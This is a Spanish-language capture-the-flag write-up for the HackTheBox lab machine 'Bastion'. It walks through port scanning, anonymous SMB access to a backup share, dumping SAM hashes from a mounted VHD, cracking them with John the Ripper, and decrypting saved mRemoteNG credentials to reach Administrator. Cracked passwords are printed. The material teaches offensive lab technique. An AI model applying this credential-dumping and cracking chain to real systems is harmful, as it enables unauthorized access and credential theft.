Bastion - HackTheBox
Empece haciendo un escaneo de puertos con Nmap.
┌─[root@parrot]─[/home/wackyhacker/Desktop]
└──╼ nmap -sS --min-rate=5000 -v -Pn -n 10.10.10.134 -oG allPorts
Starting Nmap 7.80 ( https://nmap.org ) at 2021-07-03 12:05 CEST
Initiating SYN Stealth Scan at 12:05
Scanning 10.10.10.134 [1000 ports]
Discovered open port 135/tcp on 10.10.10.134
Discovered open port 445/tcp on 10.10.10.134
Discovered open port 22/tcp on 10.10.10.134
Discovered open port 139/tcp on 10.10.10.134
Increasing send delay for 10.10.10.134 from 0 to 5 due to 226 out of 753 dropped probes since last increase.
Completed SYN Stealth Scan at 12:05, 0.32s elapsed (1000 total ports)
Nmap scan report for 10.10.10.134
Host is up (0.066s latency).
Not shown: 996 closed ports
PORT STATE SERVICE
22/tcp open ssh
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.44 seconds
Raw packets sent: 1226 (53.944KB) | Rcvd: 1000 (40.016KB)
Realice otro escaneo con Nmap para verificar la versión y servicio de cada puerto.
┌─[root@parrot]─[/home/wackyhacker/Desktop]
└──╼ nmap -sC -sV -p22,135,139,445 10.10.10.134 -oN targeted
Starting Nmap 7.80 ( https://nmap.org ) at 2021-07-03 12:06 CEST
Nmap scan report for 10.10.10.134
Host is up (0.057s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH for_Windows_7.9 (protocol 2.0)
| ssh-hostkey:
| 2048 3a:56:ae:75:3c:78:0e:c8:56:4d:cb:1c:22:bf:45:8a (RSA)
| 256 cc:2e:56:ab:19:97:d5:bb:03:fb:82:cd:63:da:68:01 (ECDSA)
|_ 256 93:5f:5d:aa:ca:9f:53:e7:f2:82:e6:64:a8:a3:a0:18 (ED25519)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -39m57s, deviation: 1h09m14s, median: 0s
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: Bastion
| NetBIOS computer name: BASTION\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2021-07-03T12:06:50+02:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-07-03T10:06:47
|_ start_date: 2021-07-02T05:29:28
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.94 seconds
Era una máquina de directorio activo, probé a listar los recursos compartidos de smb con smbmap.
┌─[root@parrot]─[/home/wackyhacker/Desktop]
└──╼ smbclient -L 10.10.10.134 -N
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
Backups Disk
C$ Disk Default share
IPC$ IPC Remote IPC
SMB1 disabled -- no workgroup available
Había un recurso compartido que me llamo la atención “Backups”, accedí a él mediante smbclient.
┌─[root@parrot]─[/home/wackyhacker/Desktop]
└──╼ smbclient //10.10.10.134/Backups
Enter WORKGROUP\root's password:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Sat Jul 3 12:06:43 2021
.. D 0 Sat Jul 3 12:06:43 2021
DLGNBAIZQY D 0 Sat Jul 3 11:53:08 2021
DOGFHMUXVJ D 0 Sat Jul 3 12:01:13 2021
GPCBDFSRMX D 0 Sat Jul 3 11:42:32 2021
IXFAVGWEBT D 0 Sat Jul 3 12:06:43 2021
IYEGGPWVFX D 0 Sat Jul 3 11:42:25 2021
LOXSWDGATI D 0 Sat Jul 3 11:53:33 2021
MekVBwjJhm D 0 Sat Jul 3 10:25:39 2021
NALTHZGBUM D 0 Sat Jul 3 12:01:50 2021
NErDtnufMa D 0 Sat Jul 3 10:25:08 2021
nmap-test-file A 260 Sat Jul 3 11:43:24 2021
note.txt AR 116 Tue Apr 16 12:10:09 2019
QOGTYSUHIF D 0 Sat Jul 3 11:54:32 2021
SDT65CB.tmp A 0 Fri Feb 22 13:43:08 2019
VWUELPZQHO D 0 Fri Jul 2 13:20:49 2021
WindowsImageBackup Dn 0 Fri Feb 22 13:44:02 2019
XSWORGUCYL D 0 Sat Jul 3 11:57:41 2021
yGvfilWFPD D 0 Sat Jul 3 11:21:00 2021
ZESQVIRNWM D 0 Sat Jul 3 12:05:33 2021
7735807 blocks of size 4096. 2760862 blocks available
Vi el archivo note.txt y sin pensármelo me lo descargue con el comando ‘get’, esto es lo que tenía.
┌─[root@parrot]─[/home/wackyhacker/Desktop]
└──╼ cat note.txt
Sysadmins: please don't transfer the entire backup file locally, the VPN to the subsidiary office is too slow.
Ponía que no transfiriese todo el archivo de copia de seguridad, por lo que pensé en que quizás hay que encontrar un archivo de copia de seguridad, junto a lo que sabía había un directorio llamado WindowsImageBackup y seguí esta ruta WindowsImageBackup/L4mpje-PC/Backup\ 2019-02-22\ 124351 y encontré dos archivos .vhd.
124351/9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd
124351/9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd
Estos archivos representan una unidad de disco duro virtual, por lo que si accedía a ellos podría encontrar cosas interesantes, pero pesan mucho, por lo que pensé en crear una montura para no tener que descargarlos.
┌─[root@parrot]─[/home/wackyhacker/Desktop]
└──╼ mkdir local_share
┌─[root@parrot]─[/home/wackyhacker/Desktop]
└──╼ mount -t cifs //10.10.10.134/backups /mnt/local_share -o user=,password=
Accedí a la montura y monte el segundo archivo vhd para ver que es lo que tenía.
┌─[root@parrot]─[/home/wackyhacker/Desktop]
└──╼ mkdir /mnt/vhd
┌─[root@parrot]─[/home/wackyhacker/Desktop]
└──╼ guestmount --add /mnt/local_share/WindowsImageBackup/L4mpje-PC/Backup\ 2019-02-22\ 124351/9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd --inspector --ro /mnt/vhd
If using guestfish ‘-i’ option, remove this option and instead
use the commands ‘run’ followed by ‘list-filesystems’.
You can then mount filesystems you want by hand using the
‘mount’ or ‘mount-ro’ command.
If using guestmount ‘-i’, remove this option and choose the
filesystem(s) you want to see by manually adding ‘-m’ option(s).
Use ‘virt-filesystems’ to see what filesystems are available.
If using other virt tools, this disk image won’t work
with these tools. Use the guestfish equivalent commands
(see the virt tool manual page).
Una vez finalizada la montura del archivo vhd accedí a él y en la ruta C:\Windows\System32\conf\, encontré el archivo SAM y SYSTEM, utilice samdump2 para volcar los hashes de las contraseñas de Windows
┌─[root@parrot]─[/home/wackyhacker/Desktop]
└──╼ samdump2 ./SYSTEM ./SAM
*disabled* Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
*disabled* Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::
Conseguí crackear el hash del usuario l4mpje con john the ripper.
┌─[root@parrot]─[/home/wackyhacker/Desktop]
└──╼ john --format=NT --wordlist=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 2 password hashes with no different salts (NT [MD4 256/256 AVX2 8x3])
Warning: no OpenMP support for this hash type, consider --fork=3
Press 'q' or Ctrl-C to abort, almost any other key for status
(Administrator)
bureaulampje (L4mpje)
2g 0:00:00:00 DONE (2021-07-03 13:53) 2.272g/s 10676Kp/s 10676Kc/s 10682KC/s burg772v..burdy1
Warning: passwords printed above might not be all those cracked
Use the "--show --format=NT" options to display all of the cracked passwords reliably
Session completed
Como la máquina tenía SSH habilitado, probé a autenticarme como el usuario l4mpje con las credenciales crackeadas y funciono.
┌─[root@parrot]─[/home/wackyhacker/Desktop]
└──╼ ssh l4mpje@10.10.10.134
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
l4mpje@BASTION C:\Users\L4mpje>
ESCALADA DE PRIVILEGIOS
La flag del usuario que estaba en el Escritorio, ahora solo faltaba la escalada de privilegios, tras una pequeña investigación, en C:\Users\L4mpje\AppData\Roaming\mRemoteNG\ encontré un archivo .xml que traía unas credenciales codificadas.
l4mpje@BASTION C:\Users\L4mpje> type confCons.xml
<?xml version="1.0" encoding="utf-8"?>
<mrng:Connections xmlns:mrng="http://mremoteng.org" Name="Connections" Export="false" Encryption
Engine="AES" BlockCipherMode="GCM" KdfIterations="1000" FullFileEncryption="false" Protected="ZS
vKI7j224Gf/twXpaP5G2QFZMLr1iO1f5JKdtIKL6eUg+eWkL5tKO886au0ofFPW0oop8R8ddXKAx4KK7sAk6AA" ConfVers
ion="2.6">
<Node Name="DC" Type="Connection" Descr="" Icon="mRemoteNG" Panel="General" Id="500e7d58-662
a-44d4-aff0-3a4f547a3fee" Username="Administrator" Domain="" Password="aEWNFV5uGcjUHF0uS17QTdT9k
VqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==" Hostname="127.0.0.1" Protocol="
RDP" PuttySession="Default Settings" Port="3389" ConnectToConsole="false" UseCredSsp="true" Rend
eringEngine="IE" ICAEncryptionStrength="EncrBasic" RDPAuthenticationLevel="NoAuth" RDPMinutesToI
dleTimeout="0" RDPAlertIdleTimeout="false" LoadBalanceInfo="" Colors="Colors16Bit" Resolution="F
itToWindow" AutomaticResize="true" DisplayWallpaper="false" DisplayThemes="false" EnableFontSmoo
thing="false" EnableDesktopComposition="false" CacheBitmaps="false" RedirectDiskDrives="false" R
edirectPorts="false" RedirectPrinters="false" RedirectSmartCards="false" RedirectSound="DoNotPla
y" SoundQuality="Dynamic" RedirectKeys="false" Connected="false" PreExtApp="" PostExtApp="" MacA
ddress="" UserField="" ExtApp="" VNCCompression="CompNone" VNCEncoding="EncHextile" VNCAuthMode=
"AuthVNC" VNCProxyType="ProxyNone" VNCProxyIP="" VNCProxyPort="0" VNCProxyUsername="" VNCProxyPa
ssword="" VNCColors="ColNormal" VNCSmartSizeMode="SmartSAspect" VNCViewOnly="false" RDGatewayUsa
geMethod="Never" RDGatewayHostname="" RDGatewayUseConnectionCredentials="Yes" RDGatewayUsername=
"" RDGatewayPassword="" RDGatewayDomain="" InheritCacheBitmaps="false" InheritColors="false" Inh
eritDescription="false" InheritDisplayThemes="false" InheritDisplayWallpaper="false" InheritEnab
leFontSmoothing="false" InheritEnableDesktopComposition="false" InheritDomain="false" InheritIco
n="false" InheritPanel="false" InheritPassword="false" InheritPort="false" InheritProtocol="fals
e" InheritPuttySession="false" InheritRedirectDiskDrives="false" InheritRedirectKeys="false" Inh
eritRedirectPorts="false" InheritRedirectPrinters="false" InheritRedirectSmartCards="false" Inhe
ritRedirectSound="false" InheritSoundQuality="false" InheritResolution="false" InheritAutomaticR
esize="false" InheritUseConsoleSession="false" InheritUseCredSsp="false" InheritRenderingEngine=
"false" InheritUsername="false" InheritICAEncryptionStrength="false" InheritRDPAuthenticationLev
el="false" InheritRDPMinutesToIdleTimeout="false" InheritRDPAlertIdleTimeout="false" InheritLoad
BalanceInfo="false" InheritPreExtApp="false" InheritPostExtApp="false" InheritMacAddress="false"
InheritUserField="false" InheritExtApp="false" InheritVNCCompression="false" InheritVNCEncoding
="false" InheritVNCAuthMode="false" InheritVNCProxyType="false" InheritVNCProxyIP="false" Inheri
tVNCProxyPort="false" InheritVNCProxyUsername="false" InheritVNCProxyPassword="false" InheritVNC
Colors="false" InheritVNCSmartSizeMode="false" InheritVNCViewOnly="false" InheritRDGatewayUsageM
ethod="false" InheritRDGatewayHostname="false" InheritRDGatewayUseConnectionCredentials="false"
InheritRDGatewayUsername="false" InheritRDGatewayPassword="false" InheritRDGatewayDomain="false"
/>
<Node Name="L4mpje-PC" Type="Connection" Descr="" Icon="mRemoteNG" Panel="General" Id="8d357
9b2-e68e-48c1-8f0f-9ee1347c9128" Username="L4mpje" Domain="" Password="yhgmiu5bbuamU3qMUKc/uYDdm
bMrJZ/JvR1kYe4Bhiu8bXybLxVnO0U9fKRylI7NcB9QuRsZVvla8esB" Hostname="192.168.1.75" Protocol="RDP"
PuttySession="Default Settings" Port="3389" ConnectToConsole="false" UseCredSsp="true" Rendering
Engine="IE" ICAEncryptionStrength="EncrBasic" RDPAuthenticationLevel="NoAuth" RDPMinutesToIdleTi
meout="0" RDPAlertIdleTimeout="false" LoadBalanceInfo="" Colors="Colors16Bit" Resolution="FitToW
indow" AutomaticResize="true" DisplayWallpaper="false" DisplayThemes="false" EnableFontSmoothing
="false" EnableDesktopComposition="false" CacheBitmaps="false" RedirectDiskDrives="false" Redire
ctPorts="false" RedirectPrinters="false" RedirectSmartCards="false" RedirectSound="DoNotPlay" So
undQuality="Dynamic" RedirectKeys="false" Connected="false" PreExtApp="" PostExtApp="" MacAddres
s="" UserField="" ExtApp="" VNCCompression="CompNone" VNCEncoding="EncHextile" VNCAuthMode="Auth
VNC" VNCProxyType="ProxyNone" VNCProxyIP="" VNCProxyPort="0" VNCProxyUsername="" VNCProxyPasswor
d="" VNCColors="ColNormal" VNCSmartSizeMode="SmartSAspect" VNCViewOnly="false" RDGatewayUsageMet
hod="Never" RDGatewayHostname="" RDGatewayUseConnectionCredentials="Yes" RDGatewayUsername="" RD
GatewayPassword="" RDGatewayDomain="" InheritCacheBitmaps="false" InheritColors="false" InheritD
escription="false" InheritDisplayThemes="false" InheritDisplayWallpaper="false" InheritEnableFon
tSmoothing="false" InheritEnableDesktopComposition="false" InheritDomain="false" InheritIcon="fa
lse" InheritPanel="false" InheritPassword="false" InheritPort="false" InheritProtocol="false" In
heritPuttySession="false" InheritRedirectDiskDrives="false" InheritRedirectKeys="false" InheritR
edirectPorts="false" InheritRedirectPrinters="false" InheritRedirectSmartCards="false" InheritRe
directSound="false" InheritSoundQuality="false" InheritResolution="false" InheritAutomaticResize
="false" InheritUseConsoleSession="false" InheritUseCredSsp="false" InheritRenderingEngine="fals
e" InheritUsername="false" InheritICAEncryptionStrength="false" InheritRDPAuthenticationLevel="f
alse" InheritRDPMinutesToIdleTimeout="false" InheritRDPAlertIdleTimeout="false" InheritLoadBalan
ceInfo="false" InheritPreExtApp="false" InheritPostExtApp="false" InheritMacAddress="false" Inhe
ritUserField="false" InheritExtApp="false" InheritVNCCompression="false" InheritVNCEncoding="fal
se" InheritVNCAuthMode="false" InheritVNCProxyType="false" InheritVNCProxyIP="false" InheritVNCP
roxyPort="false" InheritVNCProxyUsername="false" InheritVNCProxyPassword="false" InheritVNCColor
s="false" InheritVNCSmartSizeMode="false" InheritVNCViewOnly="false" InheritRDGatewayUsageMethod
="false" InheritRDGatewayHostname="false" InheritRDGatewayUseConnectionCredentials="false" Inher
itRDGatewayUsername="false" InheritRDGatewayPassword="false" InheritRDGatewayDomain="false" />
</mrng:Connections>
Lo descifré con mremoteng_decrypt.
┌─[root@parrot]─[/home/wackyhacker/Desktop]
└──╼ python3 mremoteng_decrypt.py -f hash
Password: thXLHM96BeKL0ER2
Me autentiqué a SSH como el usuario Administrador con las credenciales que tenía y conseguí ROOT.
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
administrator@BASTION C:\Users\Administrator>
Leave a comment